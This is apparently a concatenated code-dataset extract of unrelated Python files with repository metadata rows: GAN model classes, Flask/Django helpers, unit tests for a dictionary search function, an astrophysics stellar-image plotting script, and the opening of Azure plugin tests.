m.weight.data.uniform_(-5e-3, 5e-3)
m.bias.data.fill_(0)
#############################
# not in the original code: #
#############################
class latent_G(nn.Module):
def __init__(self, latent_dim, z1_dim, layers=[256, 512]):
super(latent_G, self).__init__()
model_list = []
model_list.append(nn.Linear(latent_dim, layers[0]))
for i in range(len(layers) - 1):
model_list.append(nn.LeakyReLU(negative_slope=0.2))
model_list.append(nn.Linear(layers[i], layers[i + 1]))
model_list.append(nn.LeakyReLU(negative_slope=0.2))
model_list.append(nn.Linear(layers[-1], z1_dim))
self.model = nn.Sequential(*model_list)
def forward(self, x, labels=None):
return self.model(x)
class latent_D(nn.Module):
def __init__(self, z1_dim, layers=[512, 256]):
super(latent_D, self).__init__()
model_list = []
model_list.append(nn.Linear(z1_dim, layers[0]))
for i in range(len(layers) - 1):
model_list.append(nn.LeakyReLU(negative_slope=0.2))
model_list.append(nn.Linear(layers[i], layers[i + 1]))
model_list.append(nn.LeakyReLU(negative_slope=0.2))
model_list.append(nn.Linear(layers[-1], 1)) # no activation for wgan
self.model = nn.Sequential(*model_list)
def forward(self, x, labels=None, epoch=None):
return self.model(x)
| 30.438547
| 90
| 0.53657
| 1,544
| 10,897
| 3.529145
| 0.073187
| 0.041843
| 0.07194
| 0.050468
| 0.902
| 0.890989
| 0.868967
| 0.842723
| 0.837401
| 0.805652
| 0
| 0.02513
| 0.328072
| 10,897
| 357
| 91
| 30.52381
| 0.719066
| 0.013306
| 0
| 0.7
| 0
| 0
| 0.002807
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086207
| false
| 0
| 0.003448
| 0.006897
| 0.172414
| 0.024138
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ad02e90ba120f9f588b2ed63621c0af11e095571
| 32
|
py
|
Python
|
tests/integration/issues/github_1546/good3/helper.py
|
Rohitpandit021/jina
|
f3db4d5e480375d8dc3bceda814ac1963dee76d7
|
[
"Apache-2.0"
] | 15,179
|
2020-04-28T10:23:56.000Z
|
2022-03-31T14:35:25.000Z
|
tests/integration/issues/github_1546/good3/helper.py
|
Rohitpandit021/jina
|
f3db4d5e480375d8dc3bceda814ac1963dee76d7
|
[
"Apache-2.0"
] | 3,912
|
2020-04-28T13:01:29.000Z
|
2022-03-31T14:36:46.000Z
|
tests/integration/issues/github_1546/good3/helper.py
|
Rohitpandit021/jina
|
f3db4d5e480375d8dc3bceda814ac1963dee76d7
|
[
"Apache-2.0"
] | 1,955
|
2020-04-28T10:50:49.000Z
|
2022-03-31T12:28:34.000Z
|
def helper_function():
pass
| 10.666667
| 22
| 0.6875
| 4
| 32
| 5.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.21875
| 32
| 2
| 23
| 16
| 0.84
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
ad72cc7d77f64615ecf25526fb0e199e77d840b7
| 220
|
py
|
Python
|
trackMe-backend/src/error.py
|
matth3wliuu/trackMe
|
0fb22bb8adf147fb4d4ed09c5c7253d0e54bf992
|
[
"MIT"
] | 1
|
2022-01-28T06:20:03.000Z
|
2022-01-28T06:20:03.000Z
|
trackMe-backend/src/error.py
|
matth3wliuu/trackMe
|
0fb22bb8adf147fb4d4ed09c5c7253d0e54bf992
|
[
"MIT"
] | null | null | null |
trackMe-backend/src/error.py
|
matth3wliuu/trackMe
|
0fb22bb8adf147fb4d4ed09c5c7253d0e54bf992
|
[
"MIT"
] | null | null | null |
from werkzeug.exceptions import HTTPException
class AccessError(HTTPException):
code = 403
message = "No message specified"
class InputError(HTTPException):
code = 400
message = "No message specified"
| 24.444444
| 45
| 0.736364
| 23
| 220
| 7.043478
| 0.608696
| 0.209877
| 0.197531
| 0.308642
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033898
| 0.195455
| 220
| 9
| 46
| 24.444444
| 0.881356
| 0
| 0
| 0.285714
| 0
| 0
| 0.180995
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
a8f5e72095a1dd10dd5c7af5ec8cfe804fa13e5b
| 209
|
py
|
Python
|
search_listview/tests/admin.py
|
arnaldoanez/django-search-listview
|
8b027a6908dc30c6ebc613bb4fde6b1ba40124a3
|
[
"MIT"
] | 13
|
2016-08-30T09:50:28.000Z
|
2021-04-02T06:19:55.000Z
|
search_listview/tests/admin.py
|
unistra/django-search-listview
|
9f18dfd1e6f49ace4f15bc2c8a13097fbe03709c
|
[
"MIT"
] | 2
|
2016-11-15T01:30:51.000Z
|
2017-03-10T23:01:30.000Z
|
search_listview/tests/admin.py
|
unistra/django-search-listview
|
9f18dfd1e6f49ace4f15bc2c8a13097fbe03709c
|
[
"MIT"
] | 7
|
2016-09-01T07:24:53.000Z
|
2020-11-17T16:54:23.000Z
|
from django.contrib import admin
from .models import Provider, Brand, ModelDevice, Device
admin.site.register(Provider)
admin.site.register(Brand)
admin.site.register(ModelDevice)
admin.site.register(Device)
| 26.125
| 56
| 0.822967
| 28
| 209
| 6.142857
| 0.428571
| 0.209302
| 0.395349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076555
| 209
| 8
| 57
| 26.125
| 0.891192
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
d100c398929f7369572530304b6615b87a3fdfe4
| 34
|
py
|
Python
|
segmentation/__init__.py
|
ryskiod/plant-record
|
758b19d7c239b4eab883eeccbf63cf376ed57eae
|
[
"MIT"
] | null | null | null |
segmentation/__init__.py
|
ryskiod/plant-record
|
758b19d7c239b4eab883eeccbf63cf376ed57eae
|
[
"MIT"
] | 5
|
2021-06-02T00:58:50.000Z
|
2021-06-27T03:05:22.000Z
|
segmentation/__init__.py
|
ryskiod/plant-record
|
758b19d7c239b4eab883eeccbf63cf376ed57eae
|
[
"MIT"
] | 2
|
2021-05-16T01:21:22.000Z
|
2021-05-19T13:36:36.000Z
|
from segmentation.predict import *
| 34
| 34
| 0.852941
| 4
| 34
| 7.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 34
| 1
| 34
| 34
| 0.935484
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d150e2d26e4067b0386080556d4786d999b1fde9
| 119
|
py
|
Python
|
cointracking/__init__.py
|
dzid26/HEX_stake_importer
|
d80625b2f94400b94171515d9a84587892967286
|
[
"MIT"
] | null | null | null |
cointracking/__init__.py
|
dzid26/HEX_stake_importer
|
d80625b2f94400b94171515d9a84587892967286
|
[
"MIT"
] | null | null | null |
cointracking/__init__.py
|
dzid26/HEX_stake_importer
|
d80625b2f94400b94171515d9a84587892967286
|
[
"MIT"
] | null | null | null |
from .cointracking_csv_builder import CoinTracking_CSV
from .cointracking_hex_stake import add_hex_stake_entries_to_csv
| 59.5
| 64
| 0.92437
| 18
| 119
| 5.555556
| 0.555556
| 0.32
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 119
| 2
| 64
| 59.5
| 0.892857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d16bb935a4f6e1481e0631c3494084bae318de71
| 38
|
py
|
Python
|
linkedrw/linkedr/__init__.py
|
CypherAk007/LinkedRW
|
167b8423f7229fff04ea2cbef6c29cb2ce01fb08
|
[
"MIT"
] | 114
|
2019-05-27T13:43:14.000Z
|
2021-11-30T02:29:01.000Z
|
linkedrw/linkedr/__init__.py
|
CypherAk007/LinkedRW
|
167b8423f7229fff04ea2cbef6c29cb2ce01fb08
|
[
"MIT"
] | 18
|
2019-06-02T15:22:15.000Z
|
2020-10-03T03:54:06.000Z
|
linkedrw/linkedr/__init__.py
|
CypherAk007/LinkedRW
|
167b8423f7229fff04ea2cbef6c29cb2ce01fb08
|
[
"MIT"
] | 16
|
2019-05-28T08:28:47.000Z
|
2021-08-02T09:25:55.000Z
|
from .resume import make_resume_files
| 19
| 37
| 0.868421
| 6
| 38
| 5.166667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 38
| 1
| 38
| 38
| 0.911765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d16f1ead7142ef7a9c346e7887fe2cc5069437d9
| 199
|
py
|
Python
|
python/grammar/test.py
|
trypolis464/random_scripts
|
9832e2b793e49de0bd40c975faaea216eb1903e9
|
[
"MIT"
] | null | null | null |
python/grammar/test.py
|
trypolis464/random_scripts
|
9832e2b793e49de0bd40c975faaea216eb1903e9
|
[
"MIT"
] | null | null | null |
python/grammar/test.py
|
trypolis464/random_scripts
|
9832e2b793e49de0bd40c975faaea216eb1903e9
|
[
"MIT"
] | null | null | null |
# Tests the grammar module.
#
# Copyright (C) 2021, Ty Gillespie. All rights reserved.
# MIT License.
import grammar
print(grammar.plural(1, "bat", "bats"))
print(grammar.plural(2, "bat", "bats"))
| 19.9
| 56
| 0.693467
| 28
| 199
| 4.928571
| 0.75
| 0.173913
| 0.26087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035088
| 0.140704
| 199
| 9
| 57
| 22.111111
| 0.77193
| 0.467337
| 0
| 0
| 0
| 0
| 0.138614
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
0f197eab39ce3f85d3e680a3eb149a27233ed91e
| 3,668
|
py
|
Python
|
tests/core/test_search.py
|
next-franciscoalgaba/python-benedict
|
81ff459304868327238c322a0a8a203d9d5d4314
|
[
"MIT"
] | 365
|
2019-05-21T05:50:30.000Z
|
2022-03-29T11:35:35.000Z
|
tests/core/test_search.py
|
next-franciscoalgaba/python-benedict
|
81ff459304868327238c322a0a8a203d9d5d4314
|
[
"MIT"
] | 78
|
2019-11-16T12:22:54.000Z
|
2022-03-14T12:21:30.000Z
|
tests/core/test_search.py
|
next-franciscoalgaba/python-benedict
|
81ff459304868327238c322a0a8a203d9d5d4314
|
[
"MIT"
] | 26
|
2019-12-16T06:34:12.000Z
|
2022-02-28T07:16:41.000Z
|
# -*- coding: utf-8 -*-
from benedict.core import search as _search
import unittest
class search_test_case(unittest.TestCase):
def test_search_string(self):
d = {
'a': 'Hello world',
'b': 'Hello world!',
'c': {
'd': True,
'e': ' hello world ',
'f': {
'g': 'HELLO',
'h': 12345,
'hello': True,
},
},
'u': 5,
'v': {
'x': {
'y':5,
'z':6,
},
},
'Hello world': 'Hello World',
}
results = _search(d, 'Hello', in_keys=False, in_values=False, exact=True, case_sensitive=True)
self.assertEqual(len(results), 0)
self.assertEqual(results, [])
results = _search(d, 'Hello', in_keys=False, in_values=True, exact=True, case_sensitive=True)
self.assertEqual(len(results), 0)
self.assertEqual(results, [])
results = _search(d, 'Hello', in_keys=False, in_values=True, exact=True, case_sensitive=False)
self.assertEqual(len(results), 1)
self.assertTrue((d['c']['f'], 'g', d['c']['f']['g'], ) in results)
results = _search(d, 'hello', in_keys=True, in_values=True, exact=False, case_sensitive=False)
self.assertEqual(len(results), 6)
self.assertTrue((d, 'a', d['a'], ) in results)
self.assertTrue((d, 'b', d['b'], ) in results)
self.assertTrue((d['c'], 'e', d['c']['e'], ) in results)
self.assertTrue((d['c']['f'], 'g', d['c']['f']['g'], ) in results)
self.assertTrue((d['c']['f'], 'hello', d['c']['f']['hello'], ) in results)
self.assertTrue((d, 'Hello world', d['Hello world'], ) in results)
results = _search(d, 'hello', in_keys=True, in_values=False, exact=False, case_sensitive=False)
self.assertEqual(len(results), 2)
self.assertTrue((d['c']['f'], 'hello', d['c']['f']['hello'], ) in results)
self.assertTrue((d, 'Hello world', d['Hello world'], ) in results)
def test_search_int(self):
d = {
'u': 5,
'v': {
'x': {
'y':5,
'z':6,
},
},
'w': '5',
5: 5,
'5': '5 str',
}
results = _search(d, 5, in_keys=False, in_values=False, exact=True, case_sensitive=True)
self.assertEqual(len(results), 0)
self.assertEqual(results, [])
results = _search(d, 5, in_keys=False, in_values=True, exact=True, case_sensitive=True)
self.assertEqual(len(results), 3)
self.assertTrue((d, 'u', 5, ) in results)
self.assertTrue((d['v']['x'], 'y', 5, ) in results)
self.assertTrue((d, 5, 5, ) in results)
results = _search(d, 5, in_keys=False, in_values=True, exact=True, case_sensitive=False)
self.assertEqual(len(results), 3)
self.assertTrue((d, 'u', 5, ) in results)
self.assertTrue((d['v']['x'], 'y', 5, ) in results)
self.assertTrue((d, 5, 5, ) in results)
results = _search(d, 5, in_keys=True, in_values=True, exact=False, case_sensitive=False)
self.assertEqual(len(results), 3)
self.assertTrue((d, 'u', 5, ) in results)
self.assertTrue((d['v']['x'], 'y', 5, ) in results)
self.assertTrue((d, 5, 5, ) in results)
results = _search(d, 5, in_keys=True, in_values=False, exact=False, case_sensitive=False)
self.assertEqual(len(results), 1)
self.assertTrue((d, 5, 5, ) in results)
| 37.428571
| 103
| 0.509269
| 455
| 3,668
| 4.002198
| 0.116484
| 0.146074
| 0.156507
| 0.151565
| 0.858869
| 0.845689
| 0.83196
| 0.820977
| 0.812191
| 0.79352
| 0
| 0.01816
| 0.309433
| 3,668
| 97
| 104
| 37.814433
| 0.70075
| 0.005725
| 0
| 0.4875
| 0
| 0
| 0.06118
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.025
| false
| 0
| 0.025
| 0
| 0.0625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0f2d14a494038df6012554731d504170d85dbe0d
| 97
|
py
|
Python
|
pdip/configuration/services/__init__.py
|
ahmetcagriakca/pdip
|
c4c16d5666a740154cabdc6762cd44d98b7bdde8
|
[
"MIT"
] | 2
|
2021-12-09T21:07:46.000Z
|
2021-12-11T22:18:01.000Z
|
pdip/configuration/services/__init__.py
|
fmuyilmaz/pdip
|
f7e30b0c04d9e85ef46b0b7094fafd3ce18bccab
|
[
"MIT"
] | null | null | null |
pdip/configuration/services/__init__.py
|
fmuyilmaz/pdip
|
f7e30b0c04d9e85ef46b0b7094fafd3ce18bccab
|
[
"MIT"
] | 3
|
2021-11-15T00:47:00.000Z
|
2021-12-17T11:35:45.000Z
|
from .config_parameter_base import ConfigParameterBase
from .config_service import ConfigService
| 32.333333
| 54
| 0.896907
| 11
| 97
| 7.636364
| 0.727273
| 0.238095
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082474
| 97
| 2
| 55
| 48.5
| 0.94382
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0f5a071104cd7f4e92fa036934d7fe83957da636
| 146
|
py
|
Python
|
src/simmate/calculators/vasp/database/band_structure.py
|
laurenmm/simmate-1
|
c06b94c46919b01cda50f78221ad14f75c100a14
|
[
"BSD-3-Clause"
] | 9
|
2021-12-21T02:58:21.000Z
|
2022-01-25T14:00:06.000Z
|
src/simmate/calculators/vasp/database/band_structure.py
|
laurenmm/simmate-1
|
c06b94c46919b01cda50f78221ad14f75c100a14
|
[
"BSD-3-Clause"
] | 51
|
2022-01-01T15:59:58.000Z
|
2022-03-26T21:25:42.000Z
|
src/simmate/calculators/vasp/database/band_structure.py
|
laurenmm/simmate-1
|
c06b94c46919b01cda50f78221ad14f75c100a14
|
[
"BSD-3-Clause"
] | 7
|
2022-01-01T03:44:32.000Z
|
2022-03-29T19:59:27.000Z
|
# -*- coding: utf-8 -*-
from simmate.database.base_data_types import BandStructureCalc
class MatProjBandStructure(BandStructureCalc):
pass
| 18.25
| 62
| 0.773973
| 15
| 146
| 7.4
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007874
| 0.130137
| 146
| 7
| 63
| 20.857143
| 0.866142
| 0.143836
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
0f7585fdad81d4e941ac286a05524fa7f39da373
| 5,006
|
py
|
Python
|
paul_analysis/make_stellar_box_images.py
|
lzkelley/arepo-mbh-sims_analysis
|
f14519552cedd39a040b53e6d7cc538b5b8f38a3
|
[
"MIT"
] | null | null | null |
paul_analysis/make_stellar_box_images.py
|
lzkelley/arepo-mbh-sims_analysis
|
f14519552cedd39a040b53e6d7cc538b5b8f38a3
|
[
"MIT"
] | null | null | null |
paul_analysis/make_stellar_box_images.py
|
lzkelley/arepo-mbh-sims_analysis
|
f14519552cedd39a040b53e6d7cc538b5b8f38a3
|
[
"MIT"
] | null | null | null |
import plotting.images.stellar_images as stellar_images
import matplotlib.pyplot as plt
import simread.readsubfHDF5 as subf
import numpy as np
import glob
npixels=720
for run_base in [#'explicit_feedback_256', \
'explicit_feedback_256_soft', \
# 'explicit_feedback_256_soft_old_dens', \
# 'explicit_feedback_512', \
#'explicit_feedback_512_soft_amd']: #gas_prod1_runs', 'gas_cool_runs', 'gas_adiab_runs', 'dm_runs']:
]:
print "\n\n\n"
print '../'+run_base+'/output/snap*'
snaplist = glob.glob( '../'+run_base+'/output/snap*')
n_snaps = len(snaplist)
print snaplist
for snapnum in [11]: #range(n_snaps): #range(13):
cat = subf.subfind_catalog( '../'+run_base+'/', snapnum, keysel=['GroupPos', 'GroupLenType'] )
for groupnr in range(np.min([10, len(cat.GroupLenType[:,0])] ) ):
if cat.GroupLenType[groupnr,4] > 500:
center = cat.GroupPos[groupnr,:]
print center
fig,(ax1,ax2,ax3)=plt.subplots( 1, 3, figsize=(3,1) )
image = stellar_images.stellar_image( '../'+run_base+'/output/', snapnum, center=center, \
xrange=[-0.01,0.01], yrange=[-0.01,0.01], pixels=npixels , \
cosmo_wrap=True, massmap=True, dust=True, cosmo=True,\
maxden=1.5e6, dynrange=1e3, projaxis=0, unit_length_mpc=True)
ax1.imshow(image )
image = stellar_images.stellar_image( '../'+run_base+'/output/', snapnum, center=center, \
xrange=[-0.01,0.01], yrange=[-0.01,0.01], pixels=npixels , \
cosmo_wrap=True, massmap=True, dust=True, cosmo=True,\
maxden=1.5e6, dynrange=1e3, projaxis=1, unit_length_mpc=True)
ax2.imshow(image )
image = stellar_images.stellar_image( '../'+run_base+'/output/', snapnum, center=center, \
xrange=[-0.01,0.01], yrange=[-0.01,0.01], pixels=npixels , \
cosmo_wrap=True, massmap=True, dust=True, cosmo=True,\
maxden=1.5e6, dynrange=1e3, projaxis=2, unit_length_mpc=True)
ax3.imshow(image )
fig.subplots_adjust( left=0.0, bottom=0.0, top=1.0, right=1.0, wspace=0,hspace=0)
for ax in [ax1,ax2,ax3]:
ax.axis('off')
filename='{:s}_stellar_central_image_WITH_DUST_snap_{:.0f}_group_{:.0f}_res_{:.0f}.png'.format( run_base, snapnum, groupnr, npixels)
print filename
fig.savefig( './plots/'+filename, dpi=npixels )
if True:
fig,(ax1,ax2,ax3)=plt.subplots( 1, 3, figsize=(3,1) )
image = stellar_images.stellar_image( '../'+run_base+'/output/', snapnum, center=center, \
xrange=[-0.01,0.01], yrange=[-0.01,0.01], pixels=npixels , \
cosmo_wrap=True, massmap=True, dust=False, cosmo=True,\
maxden=1.5e6, dynrange=1e3, projaxis=0)
ax1.imshow(image )
image = stellar_images.stellar_image( '../'+run_base+'/output/', snapnum, center=center, \
xrange=[-0.01,0.01], yrange=[-0.01,0.01], pixels=npixels , \
cosmo_wrap=True, massmap=True, dust=False, cosmo=True,\
maxden=1.5e6, dynrange=1e3, projaxis=1)
ax2.imshow(image )
image = stellar_images.stellar_image( '../'+run_base+'/output/', snapnum, center=center, \
xrange=[-0.01,0.01], yrange=[-0.01,0.01], pixels=npixels , \
cosmo_wrap=True, massmap=True, dust=False, cosmo=True,\
maxden=1.5e6, dynrange=1e3, projaxis=2)
ax3.imshow(image )
fig.subplots_adjust( left=0.0, bottom=0.0, top=1.0, right=1.0, wspace=0,hspace=0)
for ax in [ax1,ax2,ax3]:
ax.axis('off')
filename='{:s}_stellar_central_image_snap_{:.0f}_group_{:.0f}_res_{:.0f}.png'.format( run_base, snapnum, groupnr, npixels)
print filename
fig.savefig( './plots/'+filename, dpi=npixels )
| 46.785047
| 144
| 0.469636
| 524
| 5,006
| 4.322519
| 0.209924
| 0.031788
| 0.021192
| 0.031788
| 0.705077
| 0.705077
| 0.705077
| 0.705077
| 0.705077
| 0.702428
| 0
| 0.063624
| 0.40032
| 5,006
| 106
| 145
| 47.226415
| 0.690873
| 0.052936
| 0
| 0.553846
| 0
| 0
| 0.067344
| 0.035578
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.076923
| null | null | 0.092308
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7e2e73de49b2ae993187da70b1e5c2579dc7e2d2
| 42
|
py
|
Python
|
park/envs/cache/__init__.py
|
utkarsh5k/park
|
e7eba74f532204564df42a8e82a65ed025ce3b30
|
[
"MIT"
] | 180
|
2019-04-30T05:50:32.000Z
|
2022-03-28T01:32:07.000Z
|
park/envs/cache/__init__.py
|
utkarsh5k/park
|
e7eba74f532204564df42a8e82a65ed025ce3b30
|
[
"MIT"
] | 21
|
2019-05-03T17:42:54.000Z
|
2022-01-25T19:31:42.000Z
|
park/envs/cache/__init__.py
|
utkarsh5k/park
|
e7eba74f532204564df42a8e82a65ed025ce3b30
|
[
"MIT"
] | 42
|
2019-05-01T15:15:19.000Z
|
2021-11-19T05:27:09.000Z
|
from park.envs.cache.cache import CacheEnv
| 42
| 42
| 0.857143
| 7
| 42
| 5.142857
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 42
| 1
| 42
| 42
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7e3875fecd59cdaf314685549637debada0d1d9b
| 23
|
py
|
Python
|
macmini-liz/wrangle/src/main/python/wrangle/currency/__init__.py
|
ggear/asystem
|
c949a1624812eab5b063681f46a88ccc9527266e
|
[
"Apache-2.0"
] | 4
|
2019-03-26T13:57:54.000Z
|
2021-11-04T04:55:49.000Z
|
macmini-liz/wrangle/src/main/python/wrangle/currency/__init__.py
|
ggear/asystem
|
c949a1624812eab5b063681f46a88ccc9527266e
|
[
"Apache-2.0"
] | 1
|
2021-04-03T01:10:11.000Z
|
2021-04-03T01:10:11.000Z
|
macmini-liz/wrangle/src/main/python/wrangle/currency/__init__.py
|
ggear/asystem
|
c949a1624812eab5b063681f46a88ccc9527266e
|
[
"Apache-2.0"
] | 2
|
2019-04-02T19:20:34.000Z
|
2019-08-13T16:39:52.000Z
|
from currency import *
| 11.5
| 22
| 0.782609
| 3
| 23
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 23
| 1
| 23
| 23
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7e3e577e2a178c8aeeeeebb8010d37d8eb007d63
| 21,350
|
py
|
Python
|
cloudify_azure/tests/resources/test_compute.py
|
cloudify-incubator/cloudify-azure-plugin
|
49ecc485b70099d6d23dff81f50b17ab31f7fc18
|
[
"Apache-2.0"
] | 2
|
2018-08-16T01:50:35.000Z
|
2018-11-17T20:31:37.000Z
|
cloudify_azure/tests/resources/test_compute.py
|
cloudify-incubator/cloudify-azure-plugin
|
49ecc485b70099d6d23dff81f50b17ab31f7fc18
|
[
"Apache-2.0"
] | 43
|
2017-05-18T12:31:42.000Z
|
2019-01-08T09:20:42.000Z
|
cloudify_azure/tests/resources/test_compute.py
|
cloudify-incubator/cloudify-azure-plugin
|
49ecc485b70099d6d23dff81f50b17ab31f7fc18
|
[
"Apache-2.0"
] | 4
|
2018-01-17T15:12:54.000Z
|
2019-07-16T10:39:24.000Z
|
# Copyright (c) 2015-2020 Cloudify Platform Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import unittest
import requests
from cloudify import constants
from cloudify.state import current_ctx
from cloudify import mocks as cfy_mocks
from cloudify.exceptions import OperationRetry
from msrestazure.azure_exceptions import CloudError
from cloudify_azure import utils
from cloudify_azure.resources.compute import (availabilityset)
from cloudify_azure.resources.compute.virtualmachine import virtualmachine
def return_none(foo):
return
